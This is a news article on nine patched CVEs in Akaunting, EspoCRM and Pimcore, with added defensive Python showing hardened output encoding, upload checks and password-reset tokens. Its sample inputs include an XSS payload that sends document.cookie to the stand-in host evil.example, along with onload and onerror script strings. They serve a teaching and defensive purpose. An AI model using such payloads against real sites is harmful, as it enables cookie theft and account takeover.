If the flaws in these open-source business applications are exploited, the underlying server can be fully compromised

Jul 28, 2021 16:09 GMT  ·  By

Security researchers have disclosed nine vulnerabilities in three open-source projects, Akaunting, EspoCRM, and Pimcore, according to The Hacker News. All three are widely used by small and medium-sized businesses.

The issues affect EspoCRM v6.1.6, the Pimcore Customer Data Framework v3.0.0, the Pimcore AdminBundle v6.8.0, and Akaunting v2.1.12, and all of them were fixed by the respective maintainers after responsible disclosure, according to Rapid7 researcher Trevor Christiansen and Nokia's Wiktor Sędkowski. Six of the nine flaws were found in Akaunting.

Depending on the flaw, an attacker with a valid account could store JavaScript that executes in other users' browsers (persistent XSS), run commands on the underlying operating system and use the host as a launch point for further attacks (OS command injection), change the company associated with a user account without the user's knowledge (authentication bypass), or trigger a denial of service (DoS) with a single crafted HTTP request.

The affected software and the vulnerabilities identified in each are as follows:

Pimcore - an enterprise platform for managing customer data, digital assets, content, and digital commerce.

  • CVE-2021-31867 - SQL injection in Pimcore Customer Data Framework v3.0.0, with a CVSS score of 6.5
  • CVE-2021-31869 - SQL injection in Pimcore AdminBundle v6.8.0, with a CVSS score of 6.5

EspoCRM - a customer relationship management (CRM) solution.

  • CVE-2021-3539 - Persistent XSS in EspoCRM v6.1.6, with a CVSS score of 6.3

Akaunting - an open-source, web-based accounting application for tracking invoices and expenses.

  • CVE-2021-36805 - Persistent XSS via the invoice footer in Akaunting v2.1.12, with a CVSS score of 5.2
  • CVE-2021-36804 - Weak password reset in Akaunting v2.1.12, with a CVSS score of 5.4
  • CVE-2021-36803 - Persistent XSS via avatar upload in Akaunting v2.1.12, with a CVSS score of 6.3
  • CVE-2021-36802 - Denial of service via the user-controlled 'locale' variable in Akaunting v2.1.12, with a CVSS score of 6.5
  • CVE-2021-36800 - OS command injection in Akaunting v2.1.12, with a CVSS score of 8.7
  • CVE-2021-36801 - Authentication bypass in Akaunting v2.1.12, with a CVSS score of 8.5
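Two of the Akaunting items above are persistent XSS through a free-text field (the invoice footer) and through an avatar upload. The following Python is an added illustration of those two bug shapes in generic form; it is not code from Akaunting, EspoCRM or Pimcore, and the advisories do not describe the projects' internals at this level. The naive footer renderer is shown beside a hardened one, and the avatar handler shows content sniffing, an allowlist that deliberately excludes SVG, and a server-chosen filename. The store, the helper names and the sample inputs (payload string, SVG and PNG bytes, hostile filename) are all constructed for the example.

```python
"""Added illustration of stored XSS via a text field and via an image upload.
Not code from Akaunting, EspoCRM or Pimcore; all names and inputs are constructed."""
import html
import re
from typing import Dict, Optional

# --- constructed sample inputs ---------------------------------------------
FOOTER_PAYLOAD = 'Thanks!<script>fetch("//evil.example/?c="+document.cookie)</script>'
SVG_AVATAR = b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"></svg>'
PNG_AVATAR = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16        # PNG signature plus filler
EVIL_FILENAME = '"><img src=x onerror=alert(1)>.png'


# --- free-text field (invoice footer) ---------------------------------------
def render_footer_unsafe(footer: str) -> str:
    """Naive pattern: stored text is interpolated into HTML unchanged, so a
    payload saved once runs in the browser of every user who views the invoice."""
    return f"<footer>{footer}</footer>"


def render_footer_safe(footer: str) -> str:
    """Hardened pattern: encode for the HTML text-node context at output time."""
    return f"<footer>{html.escape(footer, quote=True)}</footer>"


# --- avatar upload -----------------------------------------------------------
IMAGE_SIGNATURES: Dict[bytes, str] = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}
EXTENSION_FOR = {"image/png": ".png", "image/jpeg": ".jpg", "image/gif": ".gif"}
UNSAFE_NAME_CHARS = re.compile(r"[^A-Za-z0-9._-]")


def sniff_image(data: bytes) -> Optional[str]:
    """Decide the type from the leading bytes, never from the client-supplied
    name or Content-Type. SVG is intentionally absent: it is XML and can
    carry script, so it is not an acceptable avatar format here."""
    for magic, mime in IMAGE_SIGNATURES.items():
        if data.startswith(magic):
            return mime
    return None


def accept_avatar_safe(filename: str, data: bytes) -> Optional[Dict[str, str]]:
    """Hardened upload handler: allowlisted content type, extension derived
    from the sniffed type, and a filename the server rewrites itself."""
    mime = sniff_image(data)
    if mime is None:
        return None
    stem = filename.rsplit(".", 1)[0]
    safe_stem = UNSAFE_NAME_CHARS.sub("_", stem)[:40] or "avatar"
    return {"stored_name": safe_stem + EXTENSION_FOR[mime], "mime": mime}


def is_safe_stored_name(name: str) -> bool:
    """True when the name contains only characters that cannot break out of
    an attribute or a path segment."""
    return re.fullmatch(r"[A-Za-z0-9._-]+", name) is not None


def render_avatar_tag(stored_name: str) -> str:
    """Even a sanitised name is encoded again at output time (defence in depth)."""
    return f'<img src="/avatars/{html.escape(stored_name, quote=True)}" alt="avatar">'


if __name__ == "__main__":
    print(render_footer_unsafe(FOOTER_PAYLOAD))
    print(render_footer_safe(FOOTER_PAYLOAD))
    print(accept_avatar_safe("me.svg", SVG_AVATAR))
    print(accept_avatar_safe(EVIL_FILENAME, PNG_AVATAR))
```

The point of the two halves is the same: the application decides how data is interpreted (as text, as an image of a known type, as a filename) instead of letting the uploader decide, and it re-encodes at the point of output regardless of what was done at the point of input.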

The Akaunting weak password reset flaw (CVE-2021-36804) is worth spelling out. An attacker could abuse the "I forgot my password" feature to send a target a phishing email containing a malicious link; when the victim opened that link, the password reset token was disclosed to the attacker, who could then use it to reset the victim's password and take over the account.
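The attack above works only if a reset link a victim clicks can hand the token to someone other than the application. The Python below is an added illustration of a reset flow designed so that this cannot happen; it is not Akaunting's code and does not describe how Akaunting fixed the issue. Its assumptions are constructed: an in-memory user table, a public base URL that comes from configuration rather than from anything in the incoming request (the `request_host` parameter is accepted and deliberately ignored to make that explicit), a 15-minute token lifetime, and hypothetical helper names. Tokens are stored only as hashes, compared in constant time, time-boxed, and consumed on first use.

```python
"""Added illustration of a hardened password-reset token flow.
Not Akaunting's code; the user table, base URL and TTL are constructed assumptions."""
import hashlib
import hmac
import secrets
from typing import Dict, Optional
from urllib.parse import urlencode

PUBLIC_BASE_URL = "https://books.example.com"   # assumption: fixed configuration value
TOKEN_TTL_SECONDS = 15 * 60                     # assumption: 15-minute validity

USERS: Dict[str, Dict[str, str]] = {"alice@example.com": {"password_hash": "old"}}  # constructed
_RESETS: Dict[str, Dict[str, object]] = {}      # email -> {"token_hash": str, "expires": float}


def _hash_token(token: str) -> str:
    return hashlib.sha256(token.encode("utf-8")).hexdigest()


def request_reset(email: str, now: float) -> Optional[str]:
    """Issue a fresh one-time token for a known user.

    Only the hash is stored, so reading the table does not yield usable tokens;
    the plaintext exists only in the email. Returns None for unknown users (the
    HTTP response to the caller should look identical in both cases)."""
    if email not in USERS:
        return None
    token = secrets.token_urlsafe(32)
    _RESETS[email] = {"token_hash": _hash_token(token), "expires": now + TOKEN_TTL_SECONDS}
    return token


def build_reset_link(email: str, token: str, request_host: str) -> str:
    """Build the emailed link from configuration. `request_host` is the value a
    real request carried; it is ignored on purpose so an attacker-chosen host
    can never become the destination the victim's browser sends the token to."""
    del request_host
    query = urlencode({"email": email, "token": token})
    return f"{PUBLIC_BASE_URL}/password/reset?{query}"


def redeem_reset(email: str, token: str, new_password_hash: str, now: float) -> bool:
    """Consume a token: must exist, be unexpired, match in constant time, and
    is invalidated before the password is changed so it cannot be replayed."""
    record = _RESETS.get(email)
    if record is None:
        return False
    if now > float(record["expires"]):
        _RESETS.pop(email, None)
        return False
    if not hmac.compare_digest(str(record["token_hash"]), _hash_token(token)):
        return False
    _RESETS.pop(email, None)
    USERS[email]["password_hash"] = new_password_hash
    return True


if __name__ == "__main__":
    t = request_reset("alice@example.com", now=0.0)
    print(build_reset_link("alice@example.com", t, request_host="evil.example"))
    print(redeem_reset("alice@example.com", t, "new-hash", now=60.0))
    print(redeem_reset("alice@example.com", t, "another", now=61.0))   # replay fails
```

In a real deployment the reset page should also avoid loading third-party resources, since a token in the URL can otherwise leak through the Referer header even when the link itself points at the right host.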

Thousands of small and medium-sized businesses run these three applications, some of them with commercial support from the respective vendors. The researchers' primary recommendation is to upgrade to the fixed releases. As an additional measure, the applications should be reachable only from the local network rather than exposed directly to the Internet; note, however, that this does not mitigate the flaws an attacker with a valid account can exploit, so patching remains the essential fix.